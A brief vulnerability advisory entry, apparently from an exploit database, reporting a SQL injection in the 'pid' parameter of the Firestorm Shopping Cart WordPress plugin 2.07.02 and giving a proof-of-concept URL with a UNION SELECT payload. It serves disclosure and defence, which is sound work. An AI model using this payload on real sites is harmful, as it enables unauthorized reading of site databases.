EPSS
Percentile
55.9%
$_POST[ ‘pid’ ] is not escaped. Url is accessible for administrator user. Url with problem: http://localhost:1406/wp/wp-admin/admin.php?page=fssc-products&fp;=general&f;=edit&cid;=0&pid;=0
http://target/wp-admin/admin.php?page=fssc-products&fp;=general&f;=edit&cid;=0&pid;=0+UNION+SELECT+name+FROM+wp_terms+WHERE+term_id=1
lenonleite.com.br/en/blog/2016/11/10/firestorm-shopping-cart-ecommerce-plugin-2-07-02-for-wordpress/